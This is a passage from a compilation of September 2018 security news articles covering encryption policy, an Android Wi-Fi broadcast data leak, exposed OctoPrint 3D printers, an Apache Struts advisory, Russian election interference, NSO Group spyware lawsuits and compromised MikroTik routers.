Similar concerns were voiced by Amnesty International, which said in a tweet, "This won't make us safer -- it will just weaken security for everyone."

Debate on 'going dark'

Encryption has been a hot-button issue in the United States for years, and came to a head in 2016 when Apple challenged the FBI's request to create software that would enable investigators to access an iPhone used by an attacker in a 2015 mass shooting in San Bernardino, California.

The US government eventually dropped its demand after finding another means to access the device, but a number of law enforcement officials have complained that they are "going dark" with the use of encrypted apps and devices that cannot be accessed by traditional wiretaps.

Nojeim said the claim of "going dark" is vastly exaggerated.

"There has never been more electronic information available to assist criminal and intelligence investigations," he said.

"We leave a digital footprint with virtually everything we do online and most of those footprints can be collected without the hindrance of encryption."

But James Lewis of the Center for Strategic and International Studies, who supports better law enforcement access, said tech firms may face more pressure than in the past.

"It's part of the bigger public move to rein in the tech companies and make them more socially responsible," Lewis said. "The old laissez-faire arguments are losing ground."

Android System Broadcasts Expose Device Information
5.9.2018 securityweek  Android

Android device details are being exposed to running applications via Wi-Fi broadcasts in the mobile operating system, Nightwatch Cybersecurity has discovered.

The exposed information includes the WiFi network name, BSSID, local IP addresses, DNS server information, and the MAC address. Normally, extra permissions are required to access such details, but Wi-Fi broadcasts allow all applications to capture the information, thus bypassing existing mitigations.

Furthermore, Nightwatch Cybersecurity’s researchers argue that the MAC address, which is tied to the hardware, can be used to “uniquely identify and track any Android device.” Information such as network name and BSSID allow for the geolocation of users, while other information can be leveraged for other attacks.

Tracked as CVE-2018-9489, the vulnerability was addressed in the recently released Android 9, but previous platform iterations continue to be impacted, ths security firm says. Thus, all devices running under those OS versions, including forks such as Amazon’s FireOS for the Kindle, are believed to be vulnerable.

The issue, the security researchers say, is that application developers neglect to implement restrictions or mask sensitive data when it comes to the use of “Intents” in their applications. These Intents are system-wide messages that both apps and the OS can send, and which other applications can listen to.

The Android platform, the security researchers explain, regularly broadcasts information about the WiFi connection and the WiFi network interface and uses WifiManager’s NETWORK_STATE_CHANGED_ACTION and WifiP2pManager’s WIFI_P2P_THIS_DEVICE_CHANGED_ACTION Intents for that.

“This information includes the MAC address of the device, the BSSID and network name of the WiFi access point, and various networking information such as the local IP range, gateway IP and DNS server addresses. This information is available to all applications running on the user’s device,” the researchers note.

Applications looking to access the information via the WifiManager would normally require the “ACCESS_WIFI_STATE” permission in the application manifest. Apps looking to access geolocation via WiFi require the “ACCESS_FINE_LOCATION” or “ACCESS_COARSE_LOCATION” permissions.

Applications listening for system broadcasts, however, don’t need these permissions and can capture the details without user’s knowledge. They can even capture the real MAC address, although it is no longer available via APIs on Android 6 or higher.

“We performed testing using a test farm of mobile device ranging across multiple types of hardware and Android versions. All devices and versions of Android tested confirmed this behavior, although some devices do not display the real MAC address in the “NETWORK_STATE_CHANGED_ACTION” intent but they still do within the “WIFI_P2P_THIS_DEVICE_CHANGED_ACTION” intent,” the researchers said.

Given that Google addressed the issue in Android 9 only, users are encouraged to upgrade to this platform iteration to ensure they remain protected.

GOBLIN PANDA Targets Vietnam Again
5.9.2018 securityweek 

CrowdStrike security researchers have observed renewed activity associated with GOBLIN PANDA, a threat actor mainly targeting entities in Southeast Asia.

First observed in 2013 and highly active in 2014, when a conflict over territory in the South China Sea was generating high tension, GOBLIN PANDA is known to focus on Vietnam. Also referred to as Cycldek, the actor has been primarily targeting entities in the defense, energy, and government sectors.

Last month, the group was observed targeting Vietnam once again, as part of a campaign that employed exploit documents featuring Vietnamese-language lures and themes. The adversary-controlled infrastructure leveraged as part of the attacks was Vietnam-themed as well.

The security researchers observed two exploit documents with Vietnamese-language file names that packed metadata unique to the GOBLIN PANDA adversary. When opened, the files display Microsoft Office Word documents with training-related themes as decoys.

“These documents did not specifically reference Vietnamese government projects or departments, however they could still be directed towards Government of Vietnam personnel,” CrowdStrike says.

These documents attempt to exploit an old Office vulnerability, namely CVE-2012-0158. The exploit code would drop the side-loading malware implant tracked as QCRat onto the compromised machine.

The documents, CrowdStrike discovered, use a “previously identified legitimate executable, and a side-loading implant Dynamic Link Library (DLL), as well as new implant configuration files stored as a .tlb file.”

While analyzing the command and control infrastructure associated with the campaign, the security researchers discovered indicators that the threat actor might be targeting entities in Laos as well. However, no attacks have been observed and CrowdStrike says it cannot confirm targets in Laos for this campaign, although GOBLIN PANDA has targeted this country before.

“Given major economic initiatives by China, such as the Belt and Road Initiative and continued dispute over the Paracel Islands, it is unlikely that GOBLIN PANDA will abandon efforts to collect intelligence from South East Asian neighbors and businesses operating in that region,” CrowdStrike concludes.

Facebook Chief Says Internet Firms in 'Arms Race' for Democracy
5.9.2018 securityweek 

Facebook chief Mark Zuckerberg said late Tuesday that the leading social network and other internet firms are in an arms race to defend democracy.

Zuckerberg's Washington Post op-ed came on the eve of hearings during which lawmakers are expected to grill top executives from Facebook and Twitter.

Google's potential participation is unclear.

The hearings come with online firms facing intense scrutiny for allowing the propagation of misinformation and hate speech, and amid allegations of political bias from the president and his allies.

"Companies such as Facebook face sophisticated, well-funded adversaries who are getting smarter over time, too," Zuckerberg said in an op-ed piece outlining progress being made on the front by the leading social network.

"It's an arms race, and it will take the combined forces of the US private and public sectors to protect America's democracy from outside interference."

After days of vitriol from President Donald Trump, big Silicon Valley firms face lawmakers with a chance to burnish their image -- or face a fresh bashing.

Twitter chief executive Jack Dorsey and Facebook chief operating officer Sheryl Sandberg were set to appear at a Senate Intelligence Committee hearing on Wednesday.

Lawmakers were seeking a top executive from Google or its parent Alphabet, but it remained unclear if the search giant would be represented.

Sources familiar with the matter said Google offered chief legal officer Kent Walker, who the company said is most knowledgeable on foreign interference, but that senators had asked for the participation of CEO Sundar Pichai or Alphabet CEO Larry Page.

Dorsey testifies later in the day at a hearing of the House Energy and Commerce Committee on online "transparency and accountability."

The tech giants are likely to face a cool reception at best from members of Congress, said Roslyn Layton, an American Enterprise Institute visiting scholar specializing in telecom and internet issues.

"The Democrats are upset about the spread of misinformation in the 2016 election, and the Republicans over the perception of bias," Layton said.

"They are equally angry, but for different reasons."

Kathleen Hall Jamieson, a University of Pennsylvania professor and author of an upcoming book on Russia's role in election hacking, said the hearings could give the companies a platform to explain how they operate.

"Hearings are an opportunity as well as a liability," she said.

"These companies have put in place fixes (on foreign manipulation) but they have done it incrementally, and they have not communicated that to a national audience."

Hackers can easily access 3D printers exposed online for sabotage and espionage
5.9.2018 securityaffairs CyberSpy

Security researchers at the SANS Internet Storm Center discovered that thousands of 3D printers are exposed online without proper defense.
The news is worrisome, thousands of 3D printers are exposed online to remote cyber attacks. According to the experts at SANS Internet Storm Center that scanned the internet for vulnerable 3D printers, a Shodan query has found more than 3,700 instances of OctoPrint interfaces exposed online, most in the United States (1,600).

The OctoPrint is a free and open source web interface for 3D printers that could be used to remotely monitor and control the devices.

Exposed 3D printers

Users can control print jobs through the interface, unauthorized accesses could be used for malicious activities, including sabotage and cyber espionage.

“So, what can go wrong with this kind of interface? It’s just another unauthenticated access to an online device. Sure but the printer owners could face very bad situations.” reads the analysis published by the experts.

“The interface allows downloading the 3D objects loaded in the printer. Those objects are in G-code format[2]. To make it simple, G-code is a language in which people tell computerized machine tools how to make something. G-code files are simple text files and are not encrypted:”

Experts warn that G-code files can be downloaded and manipulated by attackers for sabotage or and lead to potentially trade secret data leak.

“Indeed, many companies R&D departments are using 3D printers to develop and test some pieces of their future product.” continues the experts.

3D printers interface

3D printers interface“Worse, what if the attacker downloads a G-code file, alters it and re-upload it. Be changing the G-code instructions, you will instruct the device to print the object but the altered one won’t have the same physical capabilities and could be a potential danger once used.” concludes the experts.

“Think about 3D-printer guns[4] but also 3D-printed objects used in drones. Drone owners are big fans of self-printed hardware.”

Experts highlighted that 3D printers could be also used to start a fire given the high temperatures during printing operations. Attackers can also abuse the monitoring feature that uses an embedded webcam can be accessed remotely.

The OctoPrint development team recommends enabling the Access Control feature to avoid that anyone can remotely gain full control over the printer and urges the implementation of additional measures to secure the 3D printers if remote access is required.

“If you plan to have your OctoPrint instance accessible over the internet, always enable Access Control and ideally don’t make it accessible to everyone over the internet but instead use a VPN or at the very least HTTP basic authentication on a layer above OctoPrint,” states the OctoPrint documentation.

Thousands of 3D Printers Exposed to Remote Attacks
4.9.2018 securityweek  Attack

Malicious actors could take control of thousands of 3D printers that can be accessed directly from the Internet without requiring any authentication.

According to the SANS Internet Storm Center, a Shodan search reveals over 3,700 instances of OctoPrint interfaces exposed to the Web, including nearly 1,600 in the United States.

Exposed 3D printers

OctoPrint is a free and open source web interface for 3D printers that allows users to monitor and control every aspect of their device and printing jobs. OctoPrint can be used to start, stop or pause a print job, it provides access to the printer’s embedded webcam, it supplies information on the progress of a print job, and monitors the temperature of key components.

While it may seem that failure to protect a 3D printer against unauthorized access cannot pose a major risk, SANS’s Xavier Mertens warns that an attacker can conduct a wide range of malicious activities.

For instance, they can access G-code files, which are text files that contain the instructions needed to print a 3D object. In the case of organizations, these files could store valuable trade secrets.

“Indeed, many companies’ R&D departments are using 3D printers to develop and test some pieces of their future product,” Mertens noted.

The researcher pointed out that an attacker could also upload specially crafted G-code files to an unprotected printer. They could instruct the device to start printing when nobody is around, or they could make small changes to the code.

“By changing the G-code instructions, you will instruct the device to print the object but the altered one won’t have the same physical capabilities and could be a potential danger once used,” Mertens explained. “Think about 3D-printed guns but also 3D-printed objects used in drones. Drone owners are big fans of self-printed hardware.”

3D printers have been known to catch fire and it’s not implausible that an attacker may be able to intentionally start a fire given the high temperatures during operation of the system.

Finally, an attacker could be able to spy on the vulnerable printer’s owner through the embedded webcam.

These attacks are possible not due to some serious vulnerabilities in OctoPrint, but due to the failure of users to securely configure their devices.

OctoPrint developers advise users to enable the Access Control feature and take additional steps to secure the device if remote access is required. If Access Control is disabled, anyone can remotely gain full control over the printer.

“If you plan to have your OctoPrint instance accessible over the internet, always enable Access Control and ideally don’t make it accessible to everyone over the internet but instead use a VPN or at the very least HTTP basic authentication on a layer above OctoPrint,” OctoPrint documentation reads. “A physical device that includes heaters and stepper motors really should not be publicly reachable by everyone with an internet connection, even with access control enabled.”

Google Fights Tech Support Scams With New Ad Restrictions
4.9.2018 securityweek 

Google announced late last week that it’s preparing a new verification program designed to keep tech support scams off its advertising platform.

Tech support scams still represent a major issue and while these types of schemes are often unsophisticated, fraudsters have been known to use some creative methods to achieve their goals.

Tech support scammers can lure their victims through online ads, and Google’s advertising platform has been increasingly abused for this purpose. That is why the tech giant has decided to introduce some restrictions for tech support services.

“We’ve seen a rise in misleading ad experiences stemming from third-party technical support providers and have decided to begin restricting ads in this category globally,” said David Graff, director of Global Product Policy at Google.

“As the fraudulent activity takes place off our platform, it’s increasingly difficult to separate the bad actors from the legitimate providers. That’s why in the coming months, we will roll out a verification program to ensure that only legitimate providers of third-party tech support can use our platform to reach consumers,” Graff explained.

While Google is aware that the introduction of the new verification program will not block all attempts to “game” its advertising systems, the company is confident that it will at least make it “a lot harder.”

Google previously banned ads for bail bonds services and payday loans, and introduced verification programs for locksmith services and addiction treatment centers.

The company said it had paid out $12.6 billion to publishing partners in its ad network last year. On the other hand, it removed 320,000 publishers, and blacklisted roughly 90,000 websites and 700,000 mobile applications.

Google also said it took down 3.2 billion ads that violated its policies in 2017, which represents roughly 100 bad ads per second.

“We blocked 79 million ads in our network for attempting to send people to malware-laden sites, and removed 400,000 of these unsafe sites last year. And, we removed 66 million ‘trick-to-click’ ads as well as 48 million ads that were attempting to get users to install unwanted software,” the company said in its report for 2017.

Oracle Products Affected by Exploited Apache Struts Flaw
4.9.2018 securityweek 

Oracle informed customers over the weekend that some of the company’s products are affected by a critical Apache Struts 2 vulnerability that has been exploited in the wild.

The vulnerability, discovered in the open source development framework by Semmle researcher Man Yue Mo, is tracked as CVE-2018-11776 and it has been classified as critical. It allows an unauthenticated attacker to remotely execute arbitrary code on a targeted server by sending it a specially crafted request.

The existence of the flaw was disclosed on August 22, and despite the availability of only limited technical information, proof-of-concept (PoC) exploits emerged within days.

On around August 27, security firms started seeing attempts to find vulnerable Apache Struts 2 installations, and even attempts to exploit the security hole to deliver a cryptocurrency miner.

Oracle notified customers of CVE-2018-11776 on Saturday and warned that Apache Struts 2 is a component of several of its product distributions. However, the company noted that not all products incorporating Struts 2 are necessarily vulnerable.

“When the alwaysSelectFullNamespace option is enabled in a Struts 2 configuration file, and an ACTION tag is specified without a namespace attribute or a wildcard namespace, this vulnerability can be used to perform an unauthenticated remote code execution attack which can lead to a complete compromise of the targeted system,” Oracle said in its advisory.

The exact list of products impacted by the vulnerability is only available to Oracle customers, but the company revealed last year – when it warned users about another actively exploited Struts 2 flaw – that the framework is used in MySQL Enterprise Monitor, Communications Policy Management, FLEXCUBE Private Banking, Retail XBRi, Siebel, WebLogic Server, and various Financial Services and Insurance products.

Customers have been provided information on the status of each impacted product and the availability of patches. Oracle’s next Critical Patch Update (CPU) is scheduled for October 16.

Apache Struts vulnerabilities can pose a significant risk to organizations. A flaw affecting the framework was exploited in the massive Equifax breach that impacted over 140 million individuals.

Twitter to Verify Those Behind Hot-button US Issue Ads
4.9.2018 securityweek 

Twitter on Thursday started requiring those behind hot-button issue ads in the US to be vetted as part of the effort by the social network to thwart stealth campaigns aimed at influencing politics.

The tightened ad policy included requiring photos and valid contact information, and prohibited state-owned media or national authorities from buying political ads to be shown on Twitter outside their home countries.

Those placing these Twitter ads will need to be "certified" by the company and meet certain guidelines, and the ads will be labeled as political "issue" messages.

"The intention of this policy is to provide the public with greater transparency into ads that seek to influence people's stance on issues that may influence election outcomes," Twitter executives Del Harvey and Bruce Falck said in a blog post.

The new ad policy came as major technology firms including Facebook, Google and Twitter battle against misinformation campaigns by foreign agents.

Facebook, Twitter, Google and Microsoft recently blocked accounts from Russian and Iranian entities which the companies said were propagating misinformation aimed at disrupting the November US elections.

The new ad policy at Twitter applies to paid messages that identify political candidates or advocate regarding legislative issues of national importance.

Examples of issue topics provided by Twitter included abortion, civil rights, climate change, guns, healthcare, immigration, national security, social security, taxes and trade.

The policy did not apply to news agencies reporting on candidates or issues, rather than advocating outcomes, according to Harvey and Falck.

Silicon Valley executives are set to take part in a September 5 Senate hearing about foreign efforts to use social media platforms to influence elections.

Will Russian Hackers Affect This Year's US Election?
4.9.2018 securityweek  BigBrothers

Nearly a year after Russian government hackers meddled in the 2016 U.S. election, researchers at cybersecurity firm Trend Micro zeroed in on a new sign of trouble: a group of suspect websites.

The sites mimicked a portal used by U.S. senators and their staffs, with easy-to-miss discrepancies. Emails to Senate users urged them to reset their passwords — an apparent attempt to steal them.

Once again, hackers on the outside of the American political system were probing for a way in.

"Their attack methods continue to take advantage of human nature and when you get into an election cycle the targets are very public," said Mark Nunnikhoven, vice president of cloud research at Trend Micro.

Now the U.S. has entered a new election cycle. And the attempt to infiltrate the Senate network, linked to hackers aligned with Russia and brought to public attention in July, is a reminder of the risks, and the difficulty of assessing them.

Newly reported attempts at infiltration and social media manipulation — which Moscow officially denies — point to Russia's continued interest in meddling in U.S. politics. There is no clear evidence, experts said, of efforts by the Kremlin specifically designed to disrupt elections in November. But it wouldn't take much to cause turmoil.

"It's not a question of whether somebody is going to try to breach the system, to manipulate the system, to influence the system," said Robby Mook, who managed Hillary Clinton's presidential campaign and co-directs a Harvard University project to protect democracy from cyberattacks, in an interview earlier this year. "The question is: Are we prepared for it?"

Online targeting of the U.S. political system has come on three fronts — efforts to get inside political campaigns and institutions and expose damaging information; probes of electoral systems, potentially to alter voter data and results; and fake ads and accounts on social media used to spread disinformation and fan divisions among Americans.

In recent weeks, Microsoft reported that it had disabled six Russian-launched websites masquerading as U.S. think tanks and Senate sites. Facebook and the security firm FireEye revealed influence campaigns, originating in Iran and Russia, that led the social network to remove 652 impostor accounts, some targeted at Americans. The office of Republican Sen. Pat Toomey of Pennsylvania said hackers tied to a "nation-state" had sent phishing emails to old campaign email accounts.

U.S. officials said they have not detected any attempts to corrupt election systems or leak information rivaling Kremlin hacking before President Donald Trump's surprise 2016 victory.

Still, "we fully realize that we are just one click away of the keyboard from a similar situation repeating itself," Dan Coats, the director of national intelligence, said in July.

Michael McFaul, the architect of the Obama administration's Russia policy, has said he believes Russian President Vladimir Putin perceives little benefit in a major disruption effort this year, preferring to keep his powder dry for the 2020 presidential contest.

But even if the upcoming elections escape disruption, that hardly means the U.S. is in the clear.

Trump's decision in May to eliminate the post of White House cybersecurity coordinator confirmed his lack of interest in countering Russian meddling, critics say. Congress has not delivered any legislation to combat election interference or disinformation. Last week, a review of the bipartisan "Secure Elections Act" was canceled after Republican leaders registered objections, congressional staffers said.

The risks extend beyond the midterms.

"The biggest question is going to be how are you going to make sure that people actually trust the results, because democracy relies on credibility," said Ben Nimmo, a researcher at the Atlantic Council. "It's not over after November."

Experts said it is too late to safeguard U.S. voting systems and campaigns this election cycle. But with two months to go, there is time enough to take stock of the Russian-sponsored interference that has come to light so far — and to assess the risks of what we don't know.

In mid-2016, hackers found a way into the voter registration database at the Illinois State Board of Elections and spent three weeks poking around. After the breach was discovered, officials said the infiltrators had downloaded the records of up to 90,000 voters.

It's not clear that anything nefarious was done with those records. But when special counsel Robert Mueller charged a dozen Russian intelligence agents with hacking this July, the indictment clarified the potential for damage. The hackers had, in fact, stolen information on 500,000 voters, including dates of birth and partial Social Security numbers.

"The internet allows foreign adversaries to attack Americans in new and unexpected ways," Deputy Attorney General Rod Rosenstein said, in announcing the indictments.

The Illinois hack is the most notable case of foreign tampering with U.S. election systems to come to light. There has been no evidence of efforts to change voter information or tamper with voting machines, though experts caution hackers might have planted unseen malware in far-flung election systems that could be triggered later.

Potential problems are not limited to Illinois.

A week before the 2016 general election, Russian intelligence agents sent spear-phishing emails to 122 local elections officials who were customers of VR Systems, a Tallahassee, Florida-based election software vendor.

In addition to Illinois, at least 20 other state systems were probed by the same Russian military unit that targeted VR's customers, federal officials said.

"My unofficial opinion is that we're kind of fooling ourselves if we don't think that they tried to at least make a pass at all 50 states," said Christopher Krebs, the undersecretary for critical infrastructure at DHS.

In June 2017, the federal Election Assistance Commission informed dozens of local voting officials that hackers had attempted to penetrate the systems of a voting system manufacturer, presumed by many to be VR.

"Attempts have been made to obtain voting equipment, security information and in general to probe for vulnerabilities," the EAC wrote officials. Despite those concerns, federal officials have moved slowly to share intelligence with officials who supervise elections. As of mid-August, 92 state officials had been given clearances.

Much of the machinery used to collect and tabulate votes is antiquated, built by a handful of unregulated and secretive vendors, with outdated software that makes them highly vulnerable to attacks, researchers said.

"If someone was able to compromise even a handful of voting machines I think that would be sufficient to cause people to not trust the system," said Sherri Ramsay, a former National Security Agency senior executive.

This spring, a website used by Knox County, Tennessee, officials to display election-night results was knocked offline by an unidentified perpetrator. While the attack was little noticed, it would not be hard to replicate, experts said. Combined with a social media campaign alleging vote tampering, such mischief could cast a shadow over an election, they said.

Election officials have been sandboxing such scenarios for weeks as they prepare for November's balloting.

There's already a Russian playbook for thwarting an election: In Ukraine in 2014, the presidential contest was disrupted by a virus that scrambled election-management software, followed by a media disinformation campaign claiming a pro-Moscow candidate had won.

Democratic Sen. Claire McCaskill of Missouri is plenty busy this fall as she seeks re-election in a state that voted overwhelmingly for Trump. So when an attempt by Russian hackers to infiltrate her campaign came to light in July, she acknowledged it only briefly.

"While this attack was not successful, it is outrageous that they think they can get away with this," McCaskill said. "I will not be intimidated. I've said it before and I will say it again, Putin is a thug and a bully."

The failed hack, which included an attempt to steal the password of at least one McCaskill staffer through a fake Senate login website identified by Microsoft, is the most notable instance of attempted campaign meddling by Russia made public this year.

Microsoft executives said recently that the company had detected attempts by Russia's GRU military intelligence agency to hack two senators. One was presumably McCaskill, but the others have not been identified.

The group behind that attempt, Fancy Bear, is the same one indicted July 13 and identified by Microsoft as the creator of fake websites targeting the Hudson Institute and the International Republican Institute, frequent critics of the Kremlin. Since the summer of 2017, Fancy Bear has aggressively targeted political groups, universities, law enforcement agencies and anti-corruption nonprofits in the U.S. and elsewhere, according to TrendMicro.

"Russian hackers appear to be broadening their target set, but I think tying it to the midterm elections is pure speculation at this point," said Michael Connell , an analyst at the federally funded Center for Naval Analyses in Arlington, Virginia.

There have been other recent reports of U.S. congressional campaign websites targeted by hackers, but that doesn't mean Russian agents are to blame. Experts said most are likely run-of-the-mill criminal cyberattacks seeking financial gain rather than political change.

But Eric Rosenbach, who served as assistant secretary of defense for global security during President Barack Obama's administration and is now at Harvard, said the limited examples of Russian intrusion that have come to light may be only a tip to more significant, still hidden schemes.

"There probably have already been compromises of important campaigns in places where it could sway the outcome or undermine trust in the election," Rosenbach said. "We might not see that until the very last moment."

The risk is magnified by poor efforts to protect many campaign sites, said Josh Franklin, until last month the lead National Institutes of Standards and Technology researcher on voting systems security.

Nearly a third of the 527 House of Representatives campaigns examined by Franklin and fellow researchers had such poor cybersecurity they were graded worse than failing.

"We couldn't go any further with our scan," he said. "We were told that we would be in danger of being sued by the candidate campaigns."

By the time a group called "ReSisters" began organizing a rally against white nationalism for Aug. 10, it had spent more than a year sharing left-wing posts about feminism, immigration and other hot-button topics.

"Confront + Resist Fascism," the group urged on a Facebook event page for its "No Unite the Right 2" protest in Washington, D.C. Like-minded Facebook users posted information about transportation, materials and location so those interested could attend.

In late July, Facebook short-circuited the effort, shutting down the pages and accounts of ReSisters and 31 others. Despite appearing to speak for Americans, the company said, the accounts were planted by unidentified outsiders to fuel divisions among U.S. voters. Researchers at the Atlantic Council who examined the accounts said they acted in ways echoing Russian troll operations before the 2016 election, pointing to English on the pages speckled with grammatical mistakes typical of native Russian speakers.

"We face determined, well-funded adversaries who will never give up and are constantly changing tactics," Facebook said. The outing of the sites is a reminder as November approaches that Russians and other foreign actors continue to use social media to try to influence U.S. politics.

Since the 2016 election, officials and researchers have learned much more about such infiltration. The May release by House Democrats of more than 3,500 ads placed on Facebook by Russian agents from 2015 to 2017 revealed a deliberate campaign to inflame racial divisions in the U.S. Facebook and other tech companies say they are working hard to combat such behavior. But it is not nearly enough, experts said.

The companies must be forced to act faster against Russian and other disinformation campaigns and be made more accountable , said Dipayan Ghosh, a fellow at Harvard's Kennedy School of Government who has worked at both the White House and Facebook on tech policy including social media manipulation.

Ghosh said quantifying Russian disinformation on social media is difficult because they "are operating behind a commercial veil" of for-profit networks that are not subject to public scrutiny.

"The industry is currently accountable to nobody," Ghosh said.

After Facebook was criticized for allowing a data-mining firm to collect information about millions of its users, CEO Mark Zuckerberg said he was open to regulation. But the "Honest Ads Act," which would require online political ads to be identified as they are in traditional media, has stalled in Congress.

The bill's sponsors include the late John McCain and Sen. Mark Warner, the Virginia Democrat who has pressed Facebook for change since the 2016 elections. Executives from Facebook, Twitter and Google are expected to testify before Warner and other members of the Senate Intelligence Committee this week.

Experts said they are uncertain of the effectiveness of Russian disinformation, complicating assessment of the threat it might now pose.

In 2016, Russian actors likely did the greatest damage by hacking and leaking emails from Hillary Clinton's campaign and Democrats' national organization, which were widely reported by the news media. But comparatively few American voters saw individual pieces of misinformation on social media, making it unlikely that it swayed votes , said Brendan Nyhan, a University of Michigan political scientist who has analyzed the scope and impact of the Russian operations.

"There's still too much simplistic thinking about all-powerful propaganda that doesn't correspond to what we know from social science about how hard it is to change people's minds. I'm more concerned about the threat of intensifying polarization and calling the legitimacy of elections into question than I am about massive swings in vote choice," he said.

Still, it is clear that Russian intelligence views its efforts as successful and their example has already stirred others, like Iran, to try similar strategies. Such efforts are bent on coloring U.S. politics even if they are not tied to a specific election, said Lee Foster, FireEye's manager of information operations analysis.

"Where do you draw the line between efforts to influence the election or an election or efforts to influence U.S. domestic politics in general?" Foster said. "We can't just think in the context of the next election. It's not like this goes away after the midterms."

Lawsuit Lays Bare Israel-made Hack Tools in Mideast, Mexico
4.9.2018 securityweek  CyberSpy

PARIS (AP) — One day late last year, Qatari newspaper editor Abdullah Al-Athbah came home, removed the SIM card from his iPhone 7 and smashed it to pieces with a hammer.

A source had just handed Al-Athbah a cache of emails suggesting that his phone had been targeted by hacking software made by Israel's NSO Group. He told The Associated Press he considered the phone compromised.

"I feared that someone could get back into it," he said in an interview Friday. "I needed to protect my sources."

Al-Athbah, who edits Qatar's Al-Arab newspaper, now has a new phone, a new SIM card and a new approach to email attachments and links. He says he never opens anything, "even from the most trusted circles in my life."

Al-Athbah's discovery touched off a process that has led, months later, to parallel lawsuits filed in Israel and Cyprus — and provided a behind-the-scenes look at how government-grade spyware is used to eavesdrop on everyone from Mexican reporters to Arab royalty.

The NSO Group did not immediately return messages seeking comment.

The first lawsuit , filed in a Tel Aviv court on Thursday, carries a claim from five Mexican journalists and activists who allege they were spied on using NSO Group software. The second, filed in Cyprus, adds Al-Athbah to the list of plaintiffs.

Both draw heavily on the leaked material handed to the editor several months ago. Portions of the material — which appears to have been carefully picked and exhaustively annotated by an unknown party — appear to show officials in the United Arab Emirates discussing whether to hack into the phones of senior figures in Saudi Arabia and Qatar, including members of the Qatari royal family.

Al-Athba declined to identify his source and the AP was not immediately able to verify the authenticity of the material, some of which has already been entered into evidence in the Israeli case, according to Mazen Masri, a member of Al-Athbah's legal team. But The New York Times, which first reported on the lawsuits earlier Friday, indicated that it had verified some of the cache, including a reference to an intercepted telephone conversation involving senior Arab journalist Abdulaziz Alkhamis. The Times said Alkhamis confirmed having had the conversation and said he was unaware that he was under surveillance.

The parallel lawsuits underline the growing notoriety of the NSO Group, which is owned by U.S. private equity firm Francisco Partners.

One of the Mexican plaintiffs, childhood anti-obesity campaigner Alejandro Calvillo, drew global attention last year when he was revealed to have been targeted using the Israeli company's spyware. The NSO Group's programs have since been implicated in a massive espionage scandal in Panama. A month ago, respected human rights organization Amnesty International accused the company of having crafted the digital tools used to target one of its staffers.

The five Mexican plaintiffs, who were advised by Mexico City-based digital activism group widely known by its acronym R3D, are seeking 2.5 million Israeli shekels ($693,000) in compensation and an injunction to prevent the NSO Group from helping anyone spy on them.

Al-Athbah said he wanted the case to go even further and spawn restrictions on the trade in hacking tools.

"I hope selling such technology should be stopped very soon," he said.

The Continuing Problem of Aligning Cybersecurity With Business
4.9.2018 securityweek  Cyber

Aligning security policy with business practices is generally considered to be a key imperative for a successful company. This must necessarily start with security teams understanding the business, and business leaders understanding security requirements.

Varonis decided to test the progress by querying 345 C-Suite executives and IT/cybersecurity professionals -- broadly separated into business and IT/security groups -- across the U.S., UK, France and Germany. The results show apparent progress, but with puzzling details that might indicate slightly divergent viewpoints between the two groups.

For example, asked what types of data most need to be protected, both groups agreed on first customer or patient data, and second, intellectual property. They disagreed however, on the third priority. The business group specified employee data, while the security group specified financial data.

However, the most surprising divergence comes in the response to a query on the business impact of a data breach. The security group were most concerned about loss of brand image for the business, while the business group were most concerned with the cost of recovery.

"If I had been asked before the survey," Brian Vecci, technical evangelist at Varonis, told SecurityWeek, "I would have thought that non-IT folks would have been more concerned about brand image and damage than with IT recovery costs -- but it's actually the other way around. It's the security experts that are most concerned with brand perception and intellectual property loss, whereas the non-IT C-suite execs -- the top business leaders -- tend to think that IT recovery costs are the biggest issues."

The figures suggest that business and IT/sec are still not fully aligned, but in a non-intuitive manner. The reason could be something simple. Business leaders understand business better than they understand cybersecurity, and consequently worry more about what they don't fully understand; while IT/sec people understand security better than they understand commerce.

Or it could be a continuing failure for IT/sec to find the best metrics for reporting to business leaders. "It's all about data," said Vecci. "Nobody ever breaks into a network to steal the network log -- it's all about data, either exfiltrating and stealing data, or in denying service with something like ransomware."

IT/sec is aware of the scale of the data issue, while business leaders are only just becoming aware. "We're living is a more dangerous interconnected world, where anybody, anywhere can -- and if they want to, probably will -- get into your network," continued Vecci. "And the scale of the problems they have to solve when it comes to data is far bigger than it used to be. Most companies have between 30% and 50% more data this year than they had last year, and it's not slowing down -- it's just the way things work."

The data that needs to be secured is also changing in its nature. A few years ago, most sensitive data was stored in structured databases, and the need and methodologies for securing that data were well understood. Now, however, the majority of sensitive data -- made more sensitive by increasingly stringent data privacy laws like the GDPR -- is held in unstructured files and documents. Earlier this year, the 2018 Varonis Global Data Risk Report showed that 41% of companies have more than 1,000 sensitive files open to everyone with access to the network, 58% of companies have more than 100,000 folders open to everyone.

IT and security teams need increasing budgets to solve the increasing problems -- so their reporting tends to reflect the problems. They, however, are less concerned because they can see the improvements to their security posture; and the Varonis figures confirm this. Ninety-one percent of the IT/sec group believe their organization is making progress in security, while only 69% of the business leaders see that progress.

"The arrival of machine learning technologies has helped CISOs believe they are moving the needle and improving security," suggests Vecci. "They can see this, while business execs, who tend to have a more binary view of things, possibly cannot see it."

The misalignment between IT/sec and business leaders may, then, be down to the difficulty of delivering meaningful metrics on the effect of machine learning defenses. This is possibly confirmed by one of the responses in the Varonis survey. Asked whether the organization can quantify the effect of cybersecurity measures, 88% of the IT/sec group replied in the affirmative, while only 68% of the business group agreed.

Unfortunately, while this may be partially true, other figures from the Varonis survey suggest that there remains a fundamental divide between the two sides. Ninety-six per cent of the IT/sec group believes their security planning approach is aligned with the organization's risks and objectives, but only 73% of the business leaders agree.

Perhaps the most concerning response came from the question on whether business is actually listening to IT/sec. Asked whether the leadership acts on input/guidance from the IT/sec team, 94% of the IT/sec team agreed, while only 76% of the business group agreed.

This Varonis survey shows that a fundamental misalignment still exists between business and IT/sec -- but not always in the most obvious manner. It could possibly be because business leaders still do not understand cybersecurity and simply turn a deaf ear to demands for more budget; or it could be the continuing inability of the IT/sec team to find the right metrics that can be understood by business people. This could in turn be down to the speed of technological changes. IT/sec is introducing new technologies like machine learning at a faster rate than they can provide metrics on the performance of those technologies.

Experts warn of 7,500+ MikroTik Routers that are hijacking owners’ traffic
4.9.2018 securityaffairs Hacking

The security firm Qihoo 360 Netlab discovered more than 7,500 MikroTik routers that have been compromised to enable Socks4 proxy maliciously
Earlier August, experts uncovered a massive crypto jacking campaign that was targeting MikroTik routers to inject a Coinhive cryptocurrency mining script in the web traffic.

The campaign started in Brazil, but it is rapidly expanded to other countries targeting MikroTik routers all over the world, over 200,000 devices were compromised.

